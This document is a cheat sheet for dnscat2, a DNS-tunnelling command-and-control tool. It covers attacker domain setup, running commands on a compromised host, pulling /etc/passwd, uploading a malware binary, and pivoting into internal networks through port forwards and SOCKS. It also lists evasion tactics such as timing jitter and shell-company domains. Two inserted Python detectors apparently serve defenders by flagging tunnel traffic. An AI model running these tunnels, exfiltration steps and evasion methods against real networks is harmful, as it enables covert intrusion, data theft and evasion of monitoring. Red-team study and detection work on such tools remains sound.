# dnscat2

dnscat2 creates encrypted DNS tunnels for command-and-control communication, allowing attackers to bypass network restrictions by hiding traffic within DNS queries. It supports multiple DNS record types, session management, and full bidirectional communication channels.
## Installation

### Server Setup (Ruby)

Install the dnscat2 server from source with its Ruby dependencies:

```bash
# Clone server repository
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
# Install Ruby gems
gem install sinatra
gem install trollop
gem install bundler
# Or use Gemfile
bundle install
# Run server
ruby dnscat2.rb domain.com
```

Required Ruby gems: sinatra and trollop; eventmachine is optional, for async operations.
### Client Compilation (C)

Compile the C client with make:

```bash
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client
# Compile with make
make
# Or compile with gcc directly
gcc -o dnscat dnscat.c -lm -lpthread
# Windows (MinGW)
make windows
```

Dependencies: libpthread, libm (math library), and libwininet for Windows builds.
## Infrastructure Setup

### Domain and DNS Configuration

Register a domain and delegate it to your authoritative DNS server:

```text
# Delegate subdomain to your NS records
your-domain.com NS ns.attacker.com
```

Configure the authoritative DNS server to handle queries for your tunnel domain:

```text
# Example with BIND (named.conf)
zone "tunnel.attacker.com" {
    type master;
    file "/etc/bind/zones/tunnel.attacker.com";
    allow-transfer { none; };
};
```

### Authoritative DNS Server

Point NS records to the nameserver you control, where dnscat2 will listen:

```text
# DNS record configuration
tunnel.attacker.com IN NS dns1.attacker.com
dns1.attacker.com IN A 192.0.2.100
```

The dnscat2 server listens on UDP port 53 by default. Ensure the firewall allows inbound DNS traffic.
## Server Usage

### Basic Server Launch

Start the dnscat2 server for the specified domain:

```bash
# Default usage
ruby dnscat2.rb domain.com
# Listen on a specific interface (--dns takes comma-separated host=, port= and domain= pairs)
ruby dnscat2.rb --dns host=0.0.0.0,port=53,domain=domain.com
# With port specification
ruby dnscat2.rb --dns host=0.0.0.0,port=5353,domain=domain.com
# Verbose output
ruby dnscat2.rb -v domain.com
# Super verbose (debug)
ruby dnscat2.rb -vv domain.com
```
### Security Options

Enable encryption and authentication on the server:

```bash
# Require pre-shared secret for authentication
ruby dnscat2.rb --secret mysecretkey domain.com
# Security modes
ruby dnscat2.rb --security=open domain.com       # No encryption
ruby dnscat2.rb --security=encrypted domain.com  # Encrypted, no auth
ruby dnscat2.rb --secret key --security=encrypted domain.com
# Disable caching (forces fresh DNS lookups)
ruby dnscat2.rb --no-cache domain.com
# Set max packet length
ruby dnscat2.rb --max-length 255 domain.com
```
## Client Usage

### Basic Client Connection

Connect to the dnscat2 server from the compromised host:

```bash
# Basic connection
./dnscat --dns domain=domain.com
# Specify DNS server IP
./dnscat --dns server=192.0.2.100 --dns domain=domain.com
# With pre-shared secret
./dnscat --dns domain=domain.com --secret mysecretkey
# Verbose mode
./dnscat --dns domain=domain.com -v
```
### DNS Record Type Selection

Specify which DNS record types to use for tunneling:

```bash
# Use TXT records (most reliable)
./dnscat --dns type=TXT --dns domain=domain.com
# Use MX records
./dnscat --dns type=MX --dns domain=domain.com
# Use CNAME records
./dnscat --dns type=CNAME --dns domain=domain.com
# Use A records
./dnscat --dns type=A --dns domain=domain.com
# Use AAAA records (IPv6)
./dnscat --dns type=AAAA --dns domain=domain.com
# Cycle through multiple types
./dnscat --dns type=TXT --dns type=MX --dns domain=domain.com
```
### Retransmission and Reliability

Control packet retransmission behavior:

```bash
# Set maximum retransmit attempts
./dnscat --max-retransmits 5 --dns domain=domain.com
# Increase timeout (milliseconds)
./dnscat --dns timeout=1000 --dns domain=domain.com
# Reduce timeout for faster response
./dnscat --dns timeout=500 --dns domain=domain.com
```
## Session Management

### Interactive Commands

Manage active sessions from within the dnscat2 server console:

```text
# List all active sessions
> sessions
# Connect to specific session
> session -i 1
# Kill a session
> kill 1
# Suspend session (without terminating)
> suspend 1
# Resume suspended session
> resume 1
# Clear history
> history clear
```
### Session Types

Sessions vary by type and functionality:

```text
# View session details
> sessions -i 1 --detailed
# Switch between sessions quickly
> session -i 2
> session -i 3
```
## Command Shell

### Interactive Shell Access

Establish an interactive shell through the DNS tunnel:

```text
# Start shell session
> shell
# Execute single command
> exec whoami
> exec ifconfig
> exec cat /etc/passwd
```
### Execute Remote Commands

Run commands without an interactive shell:

```text
# From server console
> exec id
> exec uname -a
> exec ps aux
> exec netstat -an
```
## File Transfer

### Download Files from Target

Retrieve files from the target to the attacker system through the DNS tunnel:

```text
# Download single file
> download /etc/passwd
# Download to specific path
> download /etc/passwd /tmp/passwd.txt
# Download entire directory
> download /home/user/documents
```
### Upload Files to Target

Transfer files from the attacker system to the compromised host:

```text
# Upload file
> upload /path/to/local/file /path/on/target
# Upload with confirmation
> upload ./malware.elf /tmp/malware.elf
```
## Port Forwarding

### Local Port Forwarding Through Tunnel

Forward local ports through the DNS tunnel:

```text
# Listen on a local port and forward through the tunnel (syntax: listen [lhost:]lport rhost:rport)
> listen 127.0.0.1:4444 target_ip:3389
# Forward multiple ports
> listen 127.0.0.1:8080 internal-web-server:80
> listen 127.0.0.1:5432 internal-db:5432
```
### Accessing Forwarded Services

Connect to internal services via the forwarded ports:

```bash
# RDP through tunnel
rdesktop 127.0.0.1:4444
# SSH through tunnel
ssh -p 2222 user@127.0.0.1
# Database access
mysql -h 127.0.0.1 -P 5432 -u root
```
## Tunneling

### SOCKS Proxy Setup

Create a SOCKS proxy for full network access through the tunnel:

```text
# Establish SOCKS proxy
> socks 127.0.0.1 1080
# Access internal network through proxy
proxy-host: 127.0.0.1
proxy-port: 1080
```
### Using SOCKS Proxy

Route traffic through the established SOCKS tunnel:

```bash
# curl through SOCKS
curl --socks5 127.0.0.1:1080 http://internal-server
# SSH through SOCKS
ssh -o ProxyCommand='nc -x 127.0.0.1:1080 %h %p' user@internal-host
# Proxychains configuration
proxychains nmap -sV internal-network
```
## Encryption

### Pre-Shared Secret Authentication

Use pre-shared keys for authentication between client and server:

```bash
# Server with secret
ruby dnscat2.rb --secret "SuperSecretPassword123" domain.com
# Client with matching secret
./dnscat --secret "SuperSecretPassword123" --dns domain=domain.com
```
### SAS Authentication

Verify the connection with a SAS (Short Authentication String):

```text
# Server prompts SAS on first connection
# Compare SAS on both client and server console
# Type "y" to confirm match
SAS (client): abc123
SAS (server): abc123
```
### Encryption Modes

Different encryption configurations:

```bash
# No encryption (--security=open)
ruby dnscat2.rb --security=open domain.com
# Encrypted without authentication
ruby dnscat2.rb --security=encrypted domain.com
# Encrypted with pre-shared secret (most secure)
ruby dnscat2.rb --security=encrypted --secret mykey domain.com
```
## DNS Record Types

### Record Type Comparison

| Type | Size | Reliability | Stealth | Detection Risk |
|---|---|---|---|---|
| TXT | ~255 bytes | Excellent | Good | Medium |
| A | 4 bytes | Excellent | Poor | High |
| AAAA | 16 bytes | Good | Poor | High |
| MX | Variable | Good | Medium | Medium |
| CNAME | Variable | Good | Medium | Medium |
| NS | Variable | Moderate | Medium | Medium |
### Choosing Record Types

Select based on network filtering and monitoring:

```bash
# TXT records - most reliable, common in logs
./dnscat --dns type=TXT --dns domain=domain.com
# A records - small, fast, but suspicious high volume
./dnscat --dns type=A --dns domain=domain.com
# MX records - less monitored, good alternative
./dnscat --dns type=MX --dns domain=domain.com
# Mixed types - rotate for evasion
./dnscat --dns type=TXT --dns type=MX --dns type=CNAME --dns domain=domain.com
```
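From the defender's side, the record-type comparison and the selection advice above translate directly into query-log features: every data-carrying query needs a fresh subdomain made of encoded (high-entropy, hex-like) labels, and bulk downstream traffic concentrates TXT/MX/CNAME answers on a single base domain, whatever rotation the client uses. The following Python is an added example written for this page; it is not dnscat2 code and not part of the original cheat sheet. It profiles constructed BIND-style query-log lines per base domain and flags domains whose subdomains look like encoded data rather than hostnames. The query-log regex, the last-two-labels base-domain split (a stand-in for a public suffix lookup) and the thresholds are assumptions chosen for the constructed sample.

```python
import hashlib
import math
import re
from collections import Counter, defaultdict

# Matches the "query: <name> IN <type>" part of a BIND-style query log line
# (the timestamp/client fields around it differ between BIND versions).
QUERY_RE = re.compile(r"query: (\S+) IN (\S+)")

# Record types that carry bulk data downstream; A/AAAA answers hold only
# 4/16 bytes, so a domain answered almost only in these types stands out.
BULK_TYPES = {"TXT", "MX", "CNAME", "NULL"}


def shannon_entropy(text):
    """Bits per character: hex-encoded data sits near 4.0, hostnames near 2-3."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Assumption: last two labels are the base domain, the rest the subdomain.
    A production detector would use the public suffix list here."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def profile_domains(log_lines):
    """Aggregate lexical and record-type features per base domain."""
    seen = defaultdict(list)
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        base, sub = split_name(m.group(1))
        seen[base].append((sub, m.group(2).upper()))

    profiles = {}
    for base, items in seen.items():
        subs = [s for s, _ in items]
        types = Counter(t for _, t in items)
        n = len(items)
        profiles[base] = {
            "queries": n,
            # Each data-carrying query must use a new name, so ~1.0 is a tunnel trait.
            "unique_ratio": len(set(subs)) / n,
            "mean_sub_len": sum(len(s) for s in subs) / n,
            "mean_entropy": sum(shannon_entropy(s.replace(".", "")) for s in subs) / n,
            "types": dict(types),
            "bulk_type_share": sum(types[t] for t in BULK_TYPES) / n,
        }
    return profiles


def tunnel_suspects(profiles, min_queries=5, min_unique_ratio=0.9,
                    min_entropy=3.5, min_sub_len=40):
    """Base domains whose subdomains look like encoded data (thresholds are assumptions)."""
    return sorted(
        base for base, p in profiles.items()
        if p["queries"] >= min_queries
        and p["unique_ratio"] >= min_unique_ratio
        and (p["mean_entropy"] >= min_entropy or p["mean_sub_len"] >= min_sub_len)
    )


def constructed_log():
    """Constructed sample (not real traffic): ordinary lookups plus eight tunnel-style
    queries whose leftmost labels are hex chunks, rotating TXT/MX/CNAME answers."""
    lines = [
        "client 10.0.0.5#51234: query: www.example.org IN A + (192.0.2.1)",
        "client 10.0.0.5#51235: query: mail.example.org IN MX + (192.0.2.1)",
        "client 10.0.0.6#40001: query: www.example.org IN AAAA + (192.0.2.1)",
        "client 10.0.0.7#40002: query: cdn.example.org IN A + (192.0.2.1)",
        "client 10.0.0.5#51240: query: www.example.org IN A + (192.0.2.1)",
    ]
    for i in range(8):
        chunk = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:48]  # 48 hex chars
        qtype = ("TXT", "MX", "CNAME")[i % 3]
        lines.append(f"client 10.0.0.9#5300{i}: query: {chunk[:32]}.{chunk[32:]}"
                     f".tunnel.attacker.com IN {qtype} + (192.0.2.1)")
    return lines


if __name__ == "__main__":
    profiles = profile_domains(constructed_log())
    for base, p in profiles.items():
        print(base, p)
    print("suspects:", tunnel_suspects(profiles))
```

Note that the detector keys on the registered domain (attacker.com in the sample), not on the delegated tunnel subdomain, so rotating labels or record types under the same registered domain does not split the evidence across buckets.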
## Troubleshooting

### Connection Issues

Verify DNS resolution and connectivity:

```bash
# Test DNS resolution
nslookup query.domain.com
dig @ns.attacker.com query.domain.com
# Check server listening
netstat -ulnp | grep 53
ss -ulnp | grep 53
# Test with dig from client
dig @192.0.2.100 test.domain.com TXT
```
### Firewall and Restrictions

Bypass DNS filtering and monitoring:

```bash
# If DNS port blocked, use alternate port
ruby dnscat2.rb --dns host=0.0.0.0,port=5353,domain=domain.com
# Client connects to alternate port
./dnscat --dns server=192.0.2.100,port=5353,domain=domain.com
# Use DNS over HTTPS (requires additional config)
# Many corporate firewalls restrict DoH
```
### Debugging Output

Increase verbosity for troubleshooting:

```bash
# Client verbose
./dnscat -v --dns domain=domain.com
./dnscat -vv --dns domain=domain.com
# Server verbose
ruby dnscat2.rb -v domain.com
ruby dnscat2.rb -vv domain.com
```
## Best Practices

### Operational Security

Maintain stealthy DNS tunneling operations:

- Use TXT or MX records instead of A records (less suspicious)
- Rotate record types to evade pattern detection
- Always use pre-shared secrets and encryption
- Monitor DNS query volume and frequency
- Distribute queries over time to avoid rate-based detection
- Use domains registered to shell companies or compromised registrars
- Implement traffic shaping to match legitimate DNS patterns
### Detection Evasion

Techniques to avoid network monitoring:

- Randomize query intervals (add jitter to timing)
- Use legitimate-looking subdomains and query names
- Limit bandwidth to match normal DNS traffic
- Avoid querying during off-hours (traffic analysis)
- Use multiple tunnel domains if possible
- Implement retry logic for failed queries
- Monitor for DNS query logging and filtering
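Most of the items in the two lists above act on timing: jitter, rate limiting, traffic shaping, spreading queries over time. What none of them can change is that every byte moved upstream needs a new query name, so a detector that counts unique names and estimated encoded payload per client and base domain over a window is unaffected by them, while a pure beacon-interval detector is not. The following Python is an added example written for this page, not part of the original cheat sheet and not dnscat2 code. It profiles a constructed event stream in which a tunnel client and an ordinary workstation share identical random 10-50 s jitter, and shows that their inter-arrival statistics look alike while the volume features separate them. The tuple event format, the last-two-labels base-domain split and the thresholds are assumptions; the payload estimate assumes the tunnel hex-encodes its data into the labels (two hex characters per byte), which is how dnscat2 carries upstream data in query names.

```python
import math
import random
from collections import defaultdict

HEX_CHARS = set("0123456789abcdef")


def split_name(qname):
    """Assumption: last two labels are the base domain; the rest are subdomain labels."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), labels[:-2]


def hex_payload_bytes(labels):
    """Estimated upstream bytes in one query: two hex characters per byte in each
    all-hex label. Hostname labels such as 'www' or 'cdn' contribute nothing."""
    return sum(len(label) // 2 for label in labels if label and set(label) <= HEX_CHARS)


def coefficient_of_variation(values):
    """Sample std / mean; ~0 for a clean beacon, larger once jitter is added."""
    if len(values) < 2:
        return 0.0
    mean = sum(values) / len(values)
    var = sum((v - mean) ** 2 for v in values) / (len(values) - 1)
    return math.sqrt(var) / mean if mean else 0.0


def profile_clients(events):
    """Per (client, base domain): timing features and volume features from
    (epoch_seconds, client_ip, qname) events."""
    groups = defaultdict(list)
    for ts, client, qname in sorted(events):
        base, labels = split_name(qname)
        groups[(client, base)].append((ts, labels))

    stats = {}
    for key, items in groups.items():
        times = [t for t, _ in items]
        gaps = [b - a for a, b in zip(times, times[1:])]
        # Floor the window at one minute so a lone query is not reported as 3600/h.
        hours = max(times[-1] - times[0], 60.0) / 3600
        unique_names = len({".".join(labels) for _, labels in items})
        stats[key] = {
            "queries": len(items),
            "unique_names": unique_names,
            "unique_per_hour": unique_names / hours,
            "interarrival_cv": coefficient_of_variation(gaps),
            "est_upstream_bytes": sum(hex_payload_bytes(labels) for _, labels in items),
        }
    return stats


def suspects(stats, min_unique_per_hour=50, min_upstream_bytes=1024):
    """(client, base) pairs whose name churn or encoded volume exceeds the
    thresholds (assumed values; tune against your own resolver baseline)."""
    return sorted(k for k, s in stats.items()
                  if s["unique_per_hour"] >= min_unique_per_hour
                  or s["est_upstream_bytes"] >= min_upstream_bytes)


def constructed_events(seed=1):
    """Constructed sample (not real traffic): a tunnel client and an ordinary
    workstation, each issuing 120 queries with the same random 10-50 s jitter."""
    rng = random.Random(seed)
    events = []
    t = 0.0
    for i in range(120):
        t += rng.uniform(10, 50)
        chunk = f"{rng.getrandbits(128):032x}"  # 16 bytes of "data" per query
        events.append((t, "10.0.0.9", f"{chunk}.{i:04x}.tunnel.attacker.com"))
    t = 0.0
    names = ["www.example.org", "mail.example.org", "cdn.example.org"]
    for i in range(120):
        t += rng.uniform(10, 50)
        events.append((t, "10.0.0.5", names[i % 3]))
    return events


if __name__ == "__main__":
    stats = profile_clients(constructed_events())
    for key, s in stats.items():
        print(key, s)
    print("suspects:", suspects(stats))
```

Both clients come out with an inter-arrival coefficient of variation near 0.39 (the jitter is the same), so a beacon-regularity rule sees no difference; the tunnel client, however, produces about 120 unique names and roughly 2 KB of hex payload in the hour against three names and zero bytes for the workstation.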
### Operational Security Checklist

```bash
# Test DNS filtering
./dnscat --dns type=TXT --dns domain=test.domain.com
# Verify encryption works
./dnscat --secret testkey --dns domain=domain.com
# Monitor bandwidth
top -p $(pgrep dnscat)
# Check query logs
tail -f /var/log/syslog | grep "domain.com"
```
## Related Tools

### Alternative DNS Tunneling Solutions

| Tool | Purpose | Advantages |
|---|---|---|
| Iodine | DNS tunnel (older) | Lightweight, simple |
| dns2tcp | TCP over DNS | Reliable, RFC-compliant |
| Chisel | HTTP/HTTPS tunneling | Modern, Go-based |
| Cobalt Strike | Beacon DNS plugin | Enterprise C2, integrated |
| OzymanDNS | DNS tunneling | Simple Python implementation |
| DNSExfil | Data exfiltration | Stealthy, modular |
### Related Attack Techniques

- DNS rebinding attacks
- DNS cache poisoning
- DNSSEC spoofing
- DNS amplification DDoS
- DNS tunneling with VPN overlay